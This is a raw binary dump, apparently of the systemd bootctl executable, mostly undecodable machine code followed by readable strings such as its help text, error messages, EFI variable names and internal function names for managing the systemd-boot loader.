I�~I�A�FT/BO�a��L���/   �b��H�x�jd��H�u�H�M�E1��  L���d���E���y{�`������   �E���%������A��H�}�E�个���DI���b���&quot;���@ �u�L��Z  D��1�AWL��d  ��  H�Z#  �   �ra��^A��_����     H�u�H�}������yE��DD�H�}��}b������     �u��u�L�+Z  1�AVL�@d  ��  H��&quot;  �   �a��A��XZ�:���H�d  ��  H�5�&quot;  H�=V$  �]���a�����k������k������k������k����I����k�����vk�����k�����k�����k�����k�����k��ff.�      UH��AWI��AVL�5�*  L�E�AUATE1�SH��L��H��H�U��  dH�%(   H�E�1�H�E�H�E�    �ӑ  ����LD%[�  H��H�E�    L�E�L��H�E��`��A�Ń����   M����   �=��  ��   �q^������  M��H��(  AVD��LD�L��X  1���  L��b  H�g!  �   AT�}_��A��XZE��xA�����H�}��`��H�}�H�E�    H��t�b��H�E�dH+%(   ��  H�e�D��[A\A]A^A_]�f�     L�E�H�M��  1�L���)_��A��fD  E���1���M����  L���&amp;\��I��H�@H=  @ ��  I�D$H��H��H% �H)�H���H9�tH��   H��$�   H9�u��  H)�H��tH�L� L�t$L��I���L���^��� .efi�@ I�D$H=  @ �*  I��#H��L��I�� �L)�H���H9�tH��   H��$�   H9�u�%�  H)�H��tH�L� H�D$L��H���H��H�E��^��H�.efi.sigH�H���@�ned �  H�}��_���M��M��   �H�5�%  L����a��H��tF1�H�5)(  L��1��	`��I��H���%  H�}��d[��1�1�L�����a��L������   �^���U�L��H���8����=�   t
���t���t��yE��DD�H�}��_��H��t\L�`L���b����u�L��L���Aa��H���H���H�u�L���,a��H���3���뷐A��A����A���v���fD  �#^��뗐�X��D� E���b����z[��E��H�U�A����A�݃��8���H��L�=&#039;  D��1�R��  L��_  H�j  �   �\��� ���D  H��_  ��  �   H�5&gt;  �[b��A�����H�\_  ��  H�5  H�=�  ��X��H�=_  ��  H�5�  H�=�  ��X��H��H9�tH��   H��$�   H9�u�H��H�L$ L�t$H��I���A� H9�tH��   H��$�   H9�u�H��H�L$ H�D$H���H�E�����S\����I����f���    ��UI��H�5b&amp;  H��AWAVAUATSH��   I�8dH�%(   H�E�1�H�E�    H�E�    H�E�    H�E�    ǅ|���    �m]��H�M�H��|���A�Ņ���   �=.�   �j  H��1�L�M�1�j L�E���t��Y^A��E��xYH�=B�  轘��A�ą�xF��   �{Y�����K  L��T  ��  1�1�L��[  H��  �   �Z��f.�     H�E�dH+%(   �O	  H�e�D��[A\A]A^A_]� H��L�M�L�E�1�j 1��1t��A��XZE��x�1�1�1��u��A�ą�x��Px��A�ą�x��=*�   L�5�&quot;  �5  �   �^����h���E����   L�=U�  H��  H�5�$  �D  H�sH��H����  L���&#039;���A�ą�y�h�����  �/^������f.�     H��L�E�1��   j L�M��fs��_AXA�ă�������E1������    E��H�=��  L������g��������A�ą�x�E���a  H�5z�  H�����H�$  H�E�    H�E�    H��HD5i�  1�1��Z��I��H���$  1�H����\������  E1�L��H�]��Z��H�}��[��L�}�M��tL���]��L����Y����h�����  E�������]��被���=K�   �����=��   ��  H�i   L�u�H�E�M���Y  L���U��H��H=  @ �&quot;  H��H��H��H% �H)�H���H9�tH��   H��$�   H9�u�H��%�  H)�H��tH�L� H�\$L�u�H���L�e�H�5�&quot;  H����W��H��M9�tI�vI��H��u�H�E�H�=�   L�%�  L�u�H��h���H�E�L�}�H��X�����|�����`����   �8V��������H�=��   H�/  H�&quot;  �p  HD�H��1��   L��&lt;  L�gX  E1�PH�  1��5W��A^A_���@ L�=i�  H��  H�5�  M��LD=h�  �fD  H�sH��H�������L���G���A�ą�y����� H�=1�  輏��A�ą�����H�=�  H����  ��  ���}  H�5ԉ  t.H����  ���A�ą���������  H�5��  ���e  H���{  )�  t1ɺ  H�=�  �8V��A�ą���  H�=��  聛��A�ą�����a����H�]�H�M��  L��H���8[��A�ą�ya�T������  A��A����A��E�������A�������f�H��V  �c  H�5�  �   H�]��[��A�������    H�M��   �   H�=�   �F[��H�u�H�}�L���S��A�ă�����������   �T�����a���H��L�,  �r  AWL�;V  H�  D��   1��%U��A��XZ�5��� H�=q�  H���W���H��U  �y  H�5�  H�=!!  �Q��f�     �q��I�����H�}�A�   �V��H�E�    �����bS�����2���L�
O  ��  1�1�L��U  H�i  �   E1��~T�����f�     H��L��*  �j  AWL�WU  �����R������   A��A����A��E�个���DI��f���H��T  �z  H�5�  H�=�  �P��H��T  ��  H�5�  H�=�  �P��H��T  ��  H�5�  H�=�  �yP��H��T  �  H�5�  H�=z  �ZP��H���5؆  D��1�L��M  L�mT  ��  �   H�Z  �wS��YA��^�6����T����ug�R��������L��8  �v  1�1�L�_T  H�  �   E1��+S�����H�WT  ��  H�5�  H�=�  �O���   ���E1�E1�1ɺ  L��H����O������e�������T����i  H��z���H��L��L�����A�ą���  t��g��� ��   H�5��  H���  AW��`���I����z���L��h���AVH��X����xN��AZA[A�ą���  �Q����~&gt;H�H�  H����  WL�V  ��  1�PL�HS  H��  1��   �R��AXAY��z���H�}�H�E�    f�E��S���Å���  H�}�D�u�1������  H� fD;4G�I  H��9��D�c�   Mc�L���S��H��H����   Hc�H�E��]�H�E����   f�H�}�L���VV��A��H�}��R�������P����T������.  ��A��A����A��E�������A����������Q����O����~=A���L��J  H��J  ��  LE�L�R  D��H��  �   1���P��A���A��A����A���H�x�jT��H�E�f��&lt;���A���@���H�z  �h����RO����~�L�6K  L��Q  ��  �H�5O  ���E1�E�������L�GH��L���T��H�E�Hc�fD�0H�}��-U������fD9��j���E1�����H�}��   �U�����SL�   �~  1�ATL�+Q  �   H��  �O��[A]A��������[[����I���[[����I���H[����I���~[�����p[��f�     UH��AWAVAUATSH��H��8dH�%(   H�E�1�H��t	�? ��   L�-�  �   L���P��H�M�L�E�H�޺  H�=�  �E�H�E�    H�E�    �\O��A�ă���P  ���8  ��M������  A��A����A��E�个���DI�H�}��   �3P��H�}�H�E�    H��t�MR���E����  ���  H�E�dH+%(   ��  H�e�D��[A\A]A^A_]�D  ��K��H�PH��  @ �R  H��%H��H��H% �H)�H���H9�tH��   H��$�   H9�u��  H)�H��tH�L� L�d$H��I���L��M���&gt;N��L9�w��    H��I9�t�x�/t�H�/EFI/sys�@temdH��@ �|���@ H�}��O��E1�L�=�  �   �     H�}��K���   H�މ�1��fM��A�Ņ���  H�u����P���L�u�����  t?H�5�  L���K��H��t+H�}��EK��1�H�މ��	L������  �L������   L��A���N��D���M��H�}��N��H��tTH�XH���uR����u�L��H��H�E�    �.Q��H��tH�5�  H���O��H���!���������&#039;M���D  E1�H�}�1��N��H�}�H�E�    H������D�e����@ SL�&amp;  ��  1��u�L�WO  H�n  1��   �L��ZY�*���D  H��L�=G  D��1�SL� O  ��  H�2  �   �JL��AZA��A[�1���fD  H�O  ��  H�5  H�=�  ��H��f�     �+H��D�0�J����FE��A��EH�A����A��E1������E��DI��f�     A��L���M��D���K�����SL�@&lt;  ��  D���u�L�^N  H�u  1��   �K��AXA��AY��G��D�8�%J����&quot;E��A��EH�A����A��E�个���DI��SL��  ��  D���u�L��M  H�  1��   �!K��^A��_���K����H����V����H���W�����W����H���V����H����V��ff.�     ���UE1�1�1�1�1�H��AWAVL�M�AUATSH�ĀdH�%(   H�E�1�j H�E�    H�E�    �fd��_AXA�ą��  1�1�1���e��A�ą���   �}h��A�ą���   H�=�}  ���H�=�}  H�5�  A��蠀��E��H�=�}  H�5�  A�Չ�D����   �|���L�5�  H�=^}  ��L��D���`  �[���H�=D}  A��H�5�r  A����~��H�=+}  L�-�r  L���~��A��A���_  H�=	}  �~��H�=�|  H���  蟜���=H{   t�=�|   ��  �$H�����   H�E�dH+%(   ��  H�e�D��[A\A]A^A_]� ���L�5  H�=�|  L�����H�=~|  H�5r  A��A���}����l���D���+���H�=V|  L�-�q  L����}��H�=@|  �K}��H�=|  H���m  L���3����l���A��Ӆ��7  H�=�{  L���}��H�=�{  �}������~����D���  H�=�{  H�5rq  L�-+q  A��A���P}��H�=�{  L���A}��H�=�{  �|��A��A����  H�=z{  H�������L���~��H�=b{  L���}��H�=S{  �v|��D��х�DH��b���fD  �d��H�E�H��H��  H�E�H���  �E��H��H=  @ ��  H��H��H��H% �H���H)�H9�tH��   H��$�   ��L��D����}��D��l�����H�=�z  L���Z|��A�ą������D��l����A��� L��A  �	  1�1�L��G  H�	  �   �(G����� ��  H)�H��tH�L� L�l$H�]�I���I��L�u�L��H�5�  fD  ��F��H��M9�tI�wI��H��u�fD  D��H�=z   L�u���L�}���l����  H� 2  H��1  H�E�    E1�H�E�H��0  I��H�E�H�0  H�E�H��,  H�M�H�E���E����&gt;L�sH��M��ti1�1�L���}J��A�ǃ��t߅�y���D����WE��ED���fD  H��H��  1�1�AV�3  �   L��  L�F  ��E��XZ�fD  D��l���EH��h���H���/  D��1�AVL��@  L�BF  �   H��  �E��Y^�s���f.�     �F��������H��v���L��L��L���u�����������v���A���B��A�Ņ�xRH��x���Hǅx���    �HF��L��x���A�Ņ�~!Hc�L��1��PfD;7tlH��H��H9�u�E1�H��x����=F��D��Љ�l���D���B���D��E��Љ�l����/���H�wE  �	  H�5�  H�=4  �gA���   ��A9�A�u�L��Hc��yI��A����?E��D��I�t@)�Hc�H��H��L��x�����D���D�����l������D��l��������I���dP��  ��H��H���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       ../src/basic/string-util.h ../src/boot/bootctl.c x64 ia32 Failed to get machine-id: %m KERNEL_INSTALL_MACHINE_ID KERNEL_INSTALL_LAYOUT /etc/machine-info layout /etc/kernel/install.conf /etc/kernel/entry-token IMAGE_ID No machine ID set. Using entry token: %s bls /etc/machine-id !isempty(arg_entry_token) Failed to create &quot;%s&quot;: %m Created &quot;%s&quot;. [0m [0;1;32m [0;1;31m      Features:                  ../src/shared/pretty-print.h %s%s %s
 _nn_ &lt;= ALLOCA_MAX Removed &quot;%s&quot;. arg_make_entry_directory &gt;= 0 /loader/loader.conf arg_entry_token default %s-*
 [0;1;39m [0m[0;4m bootctl /EFI/systemd/ , boot-order in         Title: %s%s%s
            ID: 0x%04X
        Status: %sactive%s
          File: %s%s
 yes no No boot loader entries found. refreshed written image root directory esp loader SYSTEMD_WRITE_SYSTEM_TOKEN Unable to find ESP. arg1 ret_target ret_target_size @current @oneshot @default @saved ret_timeout ret_timeout_size menu-force menu-hidden %lu Not booted with UEFI. set-default set-oneshot set-timeout set-timeout-oneshot active Failed to parse argument: %s ../src/boot/bootctl-uki.c sections || scount == 0 ../src/basic/memory-util.h s1 seek to PE header PE header read error seek to PE section headers PE section header read error PE section too big seek to PE section PE section read error Kernel Type: unknown Kernel Type: uki     Cmdline: %s
     Version: %s
 osrel || osrel_size == 0 PRETTY_NAME          OS: %s
 Kernel Type: pe fd &gt;= 0 Failed to stat EFI binary: %m haystack #### LoaderInfo:   #### Malformed version string. File: esp_path Failed to read &quot;%s/%s&quot;: %m .efi          %s %s%s
 /%s/%s (%s%s%s) /%s/%s disable enable [0;1;33m [0;1;38;5;185m Boot counting Stub sets ESP information not set %sSystem:%s
       Firmware: %s%s (%s)%s
  Firmware Arch: %s
    Secure Boot: %sd (%s)
   TPM2 Support: %s%s%s
   Boot into FW: %sactive%s
   Boot into FW: supported   Boot into FW: not supported %sCurrent Boot Loader:%s
       Product: %s%s%s
          Stub: %s
           ESP: n/a %sRandom Seed:%s
  System Token: %s
 /loader/random-seed        Exists: %s
           ESP: %s esp_path || xbootldr_path ../src/shared/bootspec.h &lt; &gt; == b Failed to seek in &quot;%s&quot;: %m Copied &quot;%s&quot; to &quot;%s&quot;.  under directory  .signed /usr/lib/systemd/boot/efi Failed to read &quot;%s&quot;: %m EFI /EFI/systemd/systemd-boot Linux Boot Manager install /loader/entries.srel type1
 Cannot access &quot;%s/%s&quot;: %m Created EFI boot entry &quot;%s&quot;. /EFI/systemd /EFI/BOOT systemd-boot  Failed to remove &quot;%s/%s&quot;: %m Removed &quot;%s/%s&quot;. Removed EFI variable %s. argc &gt; 0 &amp;&amp; !isempty(argv[0]) auto host os-image-id os-id literal: --make-entry-directory= hpx status list update remove is-installed !arg_root ERRNO=%i !c-&gt;parray == !c-&gt;pn c-&gt;pfunc help version install-source print-esp-path print-path print-boot-path no-variables no-pager graceful quiet make-entry-directory make-machine-id-directory json all-architectures efi-boot-option-description kernel-identify kernel-inspect systemd-efi-options reboot-to-firmware loader/entries EFI/Linux Menu timeout control One-shot menu timeout control Default entry control One-shot entry control Load drop-in drivers Support @saved pseudo-entry     Couldn&#039;t find EFI system partition, skipping.   Couldn&#039;t find EFI system partition. It is recommended to mount it to /boot or /efi.
Alternatively, use --esp-path= to specify path to mount point.      Using EFI System Partition at %s.       Didn&#039;t find an XBOOTLDR partition, using the ESP as $BOOT.      Using XBOOTLDR partition at %s as $BOOT.        /sys/firmware/efi/fw_platform_size      Error reading EFI firmware word size, assuming &#039;%i&#039;: %m Unknown EFI firmware word size &#039;%s&#039;, using default word size &#039;%i&#039; instead.      Loaded machine ID %s from /etc/machine-id.      Failed to parse /etc/machine-info: %m   Read $KERNEL_INSTALL_MACHINE_ID from /etc/machine-info. Please move it to /etc/kernel/entry-token.      Failed to parse KERNEL_INSTALL_MACHINE_ID=%s in /etc/machine-info: %m   Loaded KERNEL_INSTALL_MACHINE_ID=%s from KERNEL_INSTALL_MACHINE_ID in /etc/machine-info.        Read $KERNEL_INSTALL_LAYOUT from /etc/machine-info. Please move it to the layout= setting of /etc/kernel/install.conf.  KERNEL_INSTALL_LAYOUT=%s is specified in /etc/machine-info.     Failed to parse /etc/kernel/install.conf: %m    layout=%s is specified in /etc/machine-info.    Failed to read /etc/kernel/entry-token: %m      Failed to load /etc/os-release: %m      No machine ID set, and /etc/os-release carries no ID=/IMAGE_ID= fields. IMAGE_ID= field not set in /etc/os-release.     ID= field not set in /etc/os-release.   Selected entry token not valid: %s      Couldn&#039;t determine whether /etc/machine-id is on a temporary file system: %m    KERNEL_INSTALL_LAYOUT=%s is configured, but Boot Loader Specification Type #1 entry directory creation was requested.   Boot loader reported no entries.        Failed to determine entries reported by boot loader, ignoring: %m       stpcpy(stpcpy(stpcpy(buffer, ansi_highlight_green()), special_glyph(SPECIAL_GLYPH_CHECK_MARK)), ansi_normal()) &lt; buffer + GREEN_CHECK_MARK_MAX  stpcpy(stpcpy(stpcpy(buffer, ansi_highlight_red()), special_glyph(SPECIAL_GLYPH_CROSS_MARK)), ansi_normal()) &lt; buffer + RED_CROSS_MARK_MAX      Failed to remove directory &quot;%s&quot;: %m     Failed to unlink file &quot;%s&quot;: %m  Failed to open &quot;%s&quot; for writing: %m     #timeout 3
#console-mode keep
  Failed to move &quot;%s&quot; into place: %m      %1$s [OPTIONS...] COMMAND ...

%5$sControl EFI firmware boot settings and manage boot loader.%6$s

%3$sGeneric EFI Firmware/Boot Loader Commands:%4$s
  status              Show status of installed boot loader and EFI variables
  reboot-to-firmware [BOOL]
                      Query or set reboot-to-firmware EFI flag
  systemd-efi-options [STRING]
                      Query or set system options string in EFI variable

%3$sBoot Loader Specification Commands:%4$s
  list                List boot loader entries
  set-default ID      Set default boot loader entry
  set-oneshot ID      Set default boot loader entry, for next boot only
  set-timeout SECONDS Set the menu timeout
  set-timeout-oneshot SECONDS
                      Set the menu timeout for the next boot only

%3$ssystemd-boot Commands:%4$s
  install             Install systemd-boot to the ESP and EFI variables
  update              Update systemd-boot in the ESP and EFI variables
  remove              Remove systemd-boot from the ESP and EFI variables
  is-installed        Test whether systemd-boot is installed in the ESP
  random-seed         Initialize random seed in ESP and EFI variables

%3$sKernel Image Commands:%4$s
  kernel-identify     Identify kernel image type
  kernel-inspect      Prints details about the kernel image

%3$sOptions:%4$s
  -h --help            Show this help
     --version         Print version
     --esp-path=PATH   Path to the EFI System Partition (ESP)
     --boot-path=PATH  Path to the $BOOT partition
     --root=PATH       Operate on an alternate filesystem root
     --image=PATH      Operate on disk image as filesystem root
     --install-source=auto|image|host
                       Where to pick files when using --root=/--image=
  -p --print-esp-path  Print path to the EFI System Partition
  -x --print-boot-path Print path to the $BOOT partition
     --no-variables    Don&#039;t touch EFI variables
     --no-pager        Do not pipe output into a pager
     --graceful        Don&#039;t fail when the ESP cannot be found or EFI
                       variables cannot be written
  -q --quiet           Suppress output
     --make-entry-directory=yes|no|auto
                       Create $BOOT/ENTRY-TOKEN/ directory
     --entry-token=machine-id|os-id|os-image-id|auto|literal:…
                       Entry token to use for this installation
     --json=pretty|short|off
                       Generate JSON output
     --all-architectures
                       Install all supported EFI architectures
     --efi-boot-option-description=DESCRIPTION
                       Description of the entry in the boot option list

See the %2$s for details.
    Failed to read EFI variable %s: %m      Checking whether %s contains any files%s        Failed to check whether %s contains any files: %m       Boot option 0x%04X referenced but missing, ignoring: %m Failed to read boot option 0x%04X: %m   Ignoring boot entry 0x%04X without partition information.       %sBoot Loaders Listed in EFI Variables:%s
          Partition: /dev/disk/by-partuuid/%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x
      Failed to determine ESP location: %m    Failed to determine XBOOTLDR partition: %m      Failed to open ESP directory &#039;%s&#039;: %m   Failed to open loader directory &#039;%s/loader&#039;: %m Failed to acquire random seed: %m       Failed to open old random seed file: %m Failed to read old random seed file: %m Failed to open random seed file for writing: %m Failed to write random seed file: %m    Failed to sync random seed file: %m     Failed to move random seed file into place: %m  Failed to sync ESP file system: %m      Random seed file %s/loader/random-seed successfully %s (%zu bytes).     Acting on %s, skipping EFI variable setup.      Not booted with EFI, skipping EFI variable setup.       Failed to parse $SYSTEMD_WRITE_SYSTEM_TOKEN, ignoring.  Not writing system token, because $SYSTEMD_WRITE_SYSTEM_TOKEN is set to false.  LoaderSystemToken-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f  LoaderSystemToken EFI variable is invalid (too short?), replacing.      Failed to test system token validity: %m        System token already written, not updating.     Existing system token size (%zu) does not match our expectations (%zu), replacing.      Failed to write &#039;LoaderSystemToken&#039; EFI variable: %m    Unable to write &#039;LoaderSystemToken&#039; EFI variable (firmware problem?), ignoring: %m      Unable to write &#039;LoaderSystemToken&#039; EFI variable, ignoring: %m  Successfully initialized system token in EFI variable with %zu bytes.   No ESP found, not initializing random seed.     Failed to synchronize the ESP &#039;%s&#039;: %m  Failed to synchronize $BOOT &#039;%s&#039;: %m    LoaderEntrySelected-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f        Failed to get EFI variable &#039;LoaderEntrySelected&#039;: %m    LoaderEntryOneShot-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f Failed to get EFI variable &#039;LoaderEntryOneShot&#039;: %m     LoaderEntryDefault-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f Failed to get EFI variable &#039;LoaderEntryDefault&#039;: %m     Unsupported special entry identifier: %s        Failed to parse timeout &#039;%s&#039;: %m        Timeout is too long and will be treated as &#039;menu-force&#039; instead.        LoaderConfigTimeout-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f        LoaderConfigTimeoutOneShot-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f /sys/firmware/efi/efivars/LoaderInfo-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f       Not booted with a supported boot loader.        Failed to detect whether boot loader supports &#039;%s&#039; operation: %m        &#039;%s&#039; operation not supported in a container.    &#039;%s&#039; operation cannot be combined with --no-variables.  Failed to remove EFI variable &#039;%s&#039;: %m  Failed to update EFI variable &#039;%s&#039;: %m  No SystemdOptions EFI variable present in cache.        Failed to read SystemdOptions EFI variable from cache: %m       Note: SystemdOptions EFI variable has been removed since boot.  Failed to check SystemdOptions EFI variable in efivarfs, ignoring: %m   Note: SystemdOptions EFI variable has been modified since boot. New value: %s   SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67     Failed to set SystemdOptions EFI variable: %m   Failed to query reboot-to-firmware state: %m    Failed to set reboot-to-firmware option: %m     File is smaller than DOS magic (got %lu of %zu bytes)   File is smaller than DOS header (got %lu of %zu bytes)  Failed to open UKI file &#039;%s&#039;: %m        Failed to open embedded os-release file, ignoring: %m   Failed to parse embedded os-release file, ignoring: %m  EFI binary is not a regular file: %m    Failed to memory map EFI binary: %m     Failed to open &quot;%s/%s&quot; for reading: %m  driver only, firmware unavailable       firmware only, driver unavailable       Failed to determine XBOOTLDR location: %m       LoaderFirmwareType-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f LoaderFirmwareInfo-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f LoaderInfo-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f StubInfo-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f   LoaderImageIdentifier-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f      Failed to read EFI variable LoaderDevicePartUUID: %m      Boot into FW: %sfailed%s (%m)
        Boot loader sets ESP information        WARNING: The boot loader reports a different ESP UUID than detected (%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x vs. %02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x)!
             ESP: /dev/disk/by-partuuid/%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x
      /sys/firmware/efi/efivars/LoaderSystemToken-4a67b082-0a4c-41cf-b6c7-440b29bb8c4f        %sSystem:%s
Not booted with EFI

       %sAvailable Boot Loaders on ESP:%s
      (/dev/disk/by-partuuid/%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x)   systemd-boot not installed in ESP.      No default/fallback boot loader installed in ESP.       Failed to access EFI variables, efivarfs needs to be available at /sys/firmware/efi/efivars/.   Failed to read EFI boot entries: %m     Failed to read EFI boot order: %m       No boot loaders listed in EFI Variables.
       %sBoot Loader Entries:%s
        $BOOT: %s      %zu entries, no entry could be determined as default.
  %sDefault Boot Loader Entry:%s
 (size_t) config-&gt;default_entry &lt; config-&gt;n_entries      
WARNING: default boot entry is broken  Failed to open &quot;%s&quot; for reading: %m     Source file &quot;%s&quot; does not carry version information!    Skipping &quot;%s&quot;, since it&#039;s owned by another boot loader. Comparing versions: &quot;%s&quot; %s &quot;%s Skipping &quot;%s&quot;, since newer boot loader version in place already.        Skipping &quot;%s&quot;, since same boot loader version in place already. Failed to copy data from &quot;%s&quot; to &quot;%s&quot;: %m       Failed to rename &quot;%s&quot; to &quot;%s&quot;: %m       Failed to resolve path %s%s%s: %m       Failed to resolve path %s under directory %s: %m        Failed to open boot loader directory %s%s: %m   Failed to access EFI variables. Is the &quot;efivarfs&quot; filesystem mounted?   Failed to determine current boot order: %m      Skipping update because sd-boot is not installed in the ESP.    Failed to write entry token &#039;%s&#039; to /etc/kernel/entry-token: %m Not changing EFI variables with --all-architectures.    Failed to create EFI Boot variable entry: %m    Failed to open directory &quot;%s/EFI/BOOT&quot;: %m      Failed to remove EFI variable %s: %m    Unexpected parameter for --install-source=: %s  --print-boot-path/-x cannot be combined with --print-esp-path/-p        Unexpected parameter for --entry-token=: %s     Invalid --efi-boot-option-description=: %s      --efi-boot-option-description= too long: %zu &gt; %zu      Options --root= and --image= are not supported with verb %s.    Please specify either --root= or --image=, the combination of both is not supported.    --install-from-host is only supported with --root= or --image=. ../src/basic/static-destruct.h  Picks up credentials from boot partition        Picks up system extension images from boot partition    Measures kernel+command line+sysexts    Support for passing random seed to OS   Support for XBOOTLDR partition  Support Type #1 sort-key field  Support Type #1 devicetree field        �%�� %���$��h$���%��-��g�����������g��[��s�������.��!�����        print_efi_option                read_pe_section memmem_safe     get_file_version        memcmp_safe             find_pe_section pe_sections     inspect_osrel   .uname  .cmdlineverb_kernel_inspect             verb_kernel_identify    .initrd .linux  .osrel  is_uki  parse_argv run  array_cleanup           static_destruct main            verb_reboot_to_firmware         verb_systemd_efi_options        verb_random_seed                verb_set_efivar parse_loader_entry_target_arg   parse_timeout   remove_loader_variables verb_remove             install_entry_directory         install_entry_token             install_loader_specification    install_variables       verb_install            sync_everything set_system_token                install_random_seed     verb_list               status_binaries status_variables                boot_config_default_entry       status_entries  verb_status     are_we_installed                green_check_mark_internal       red_cross_mark_internal read_efi_var help       install_loader_config   remove_file             remove_boot_efi remove_binaries remove_entry_directory  rmdir_one               install_binaries        copy_one_file   mkdir_one               compare_product version_check   copy_file_with_version_check    boot_config_load_and_select     enumerate_binaries      get_efi_arch            load_etc_machine_id             load_etc_machine_info           load_etc_kernel_install_conf    settle_entry_token              settle_make_entry_directory     acquire_xbootldr        acquire_esp             free_and_strdup_warn            /loader/loader.c;�  R    ��   ����  0��l  ?��P  P���  ���(  ���t  ���,  ��d  &#039;���  8��T	  H���	  b��@
  r���
  ���  ���l  ���`  ����  ���(  ���  ���0  ����  ���&lt;  ����  i��  ���x  ����  &gt;��&lt;  `��`  p���  `��  ���0  ���L  ���h   ���   ���  @���  `���  ����  ���&lt;   ���  ����  ���  @��p  �&amp;���  �(��D  �)���  `+���   -��P  �/���  0���  �1��   4��,  @7���  �8���   9��	  P:��t	  �=���	  @&gt;��
  p@��`
  @M���
  0N��  `O��X   R���  �T���  PY��&lt;  @\���   ^���  �^���  @_��   �c���  e���  @g��L  �k���  o���  @s��T  ���  �`  �����  ����4  p����  P���             zR x�        ���&amp;    D    $   4   (� 
   FJw� ?:*3$&quot;       \    �
             t   H��9    DM
G\      �   h��    E�S      �   l��    E�S      �   p��    E�S      �   t��    E�S        x��    E�S         |��    E�S      &lt;  ���    E�S   $   X  ���/    A�A�D fAA        zPLR x��(  �  ,   $   l��L   W  B�A�D �s
CBA   T   ����   /   ���   L   �  l��y   B�K�A �F0e8D@BHEPL0T
 DABE�8L@^8A0 &lt;   @  ���]   B�D�H �J0y
 DABHT8L@^8A00     ���^  �  A�JK���.R. w
Aa.   8  ��   ]  ���  T   X  ����  E  A�CD��Q��y.v. 
K;.E. s.a. }.g. �.t.      �  ����p   �  �����  8   �  � ���  �  B�G�G0g
ABFX
ABE      ����   t  0�� ,   ,  4&quot;��(  `  A�TI���{
Gh.    \  Z���   ?  ����@   �  #���   B�F�B �D(�D0�Dp�
0A(A BBBC P   �  �$���  �  B�B�B �B(�A0�D8�D�
8D0A(B BBBD         ����   �  �������,   �  �%��b   A�CB�I���H�9
H    �  (��    Da
KF
J\     h(��x   B�B�A �D(�G0�
(D ABBA^
(A AEBIG
(A ABBK (   d  �)��u   A�CM������
F4     �+��0  �  A�CK�����
C�.t.       L  ����#   �  A����� 0   p  �.��K  j  E�QM����.o
D.       �  c���   @  ����&lt;   @  �/��f    A�A�G ^
AAGD(L0^(A DAA 4     �/��A  �
  A�XD��K.Q. H
Gz.f.     &lt;  ���   �
  ���  H   \  �0��_  �
  A�CN���I�H��.`R. a
Ht.L. z.V. w.I.     �  ����   d
  ������$   H  �3���    F�WB FAo
K0   �  ,4��&amp;   
  E�HJ��g.o. �
J      (  ���   
  ���  T   H  6���  �	  A�CP������
E�.c. +. `. J.Y. ..^. !.L.      �  ����  S
  ������(   @  \B���    F�aB B(B0Ig
C L   l   C��,   B�A�D @
DBCk
AEGl(F0j(A O(F0l(A  @   �   D���   F�B�A ��
BBDs(M0`(A HISH    	  \F���   F�B�A �A(�D`�
(A ABBA�hKp`hA`   0   �  �H���  5	  E�CI����
D.        g���   !	  ����,   $  M���  		  E�CE�J
I.p.    T  (���   �  ��@   �	  �O���   F�A�D v
DBIj
DBH�(M0a(A     0
  ,Q���    Dx
D  4   L
  �Q���    B�A�D l
CBH\
IIJ  &lt;   	  R��Z  R  A�CP������.c. 
Ai.W.        H	  N���   z  ������0   l	  V��n  ^  E�CD��H��
F�.      �	  ���   D  ����L   �	  0W��+  ,  B�B�B �B(�A0�A8�D@u
8D0A(B BBBH      
  ����&amp;     @������ &lt;   4
  �X���  �  E�CI�����
E�.Q. n.       t
  ����~     ������@     ]��5   B�B�B �A(�A0�G��
0D(A BBBC8   �
  `��#  �  A�CM������
E .r. �.      [���Z   �  ������P   &lt;  �c���  �  E�CP�����
G�.`N. �.`P. .�j. �.`c.       �  =����     ������l   �  |��	  �  A�CB�E�M����._. m.[. �
F�._. �.V. �.�. #. T. �.�. w.d. S.    $  @���t     ������D   H  �����  �  A�CH����D��. a
DP. �.a. O.i.     �  H���q     ������@   �  ���  �  A�CB�E�O��D��.X
JR. �.g.       �  Q���&#039;   �  ������@     T����  �  E�MP�����
D&gt;.|. r.�.  $   `  ���]   �  A������   @   �  ș���  �  A�CI������
F.�. x.V. T.    �  ���Q   �  ������0   �  @����  �  E�NQ�����h
D       $  ��   �  ������&lt;   H  ��  �  E�CP������
A�.{. $.c.     ��@ ��  ��-�� ��  ���(!  �_� �� ��  �� �� �G� �8� �� �  �&gt;� �	  �	*� �
Z� �� �6  �f� �#  �� �� �   �7� �7� �  �� �o  �� �  �� �� �  �� ��� �  ��R  ��&gt;A  �w� �  �8� ��	  ��� 7�� ��  ��&gt;� �� ��  ��m� ~  ��� ��   ��:�� ��  ��
  .�� ��  ��M�� ��  ��~�� �  ��� ��  ���A� \� �� �� �  �� �� �� �� �� �� �� �� �� �� �� �m� �� �� �� �� �� ��� �
� ��� ��� �7� �� ��� ��� �� ��0� 8� C  ��*�  �&amp;� �  �� ��  ��  ��!,  t� �  ��� �  ��� ��  ��dF� j� �� �� �� �� �� �� �� �� �� �� �� �M� �� �� �� ��  ��6� R1� �  ��� ��  ��-3� c� s� �� �� �G� �� �8� ��  ��L:� ^@� ��� �  �� �� �� �� �L� �� �� �� �� ��(u [  ��X^� �  �� �� �� �� �� �� �� �U� �� �7� �� �� �7� ��
Q 2  �����  ���0 ���0 ��  ��0 �  ��
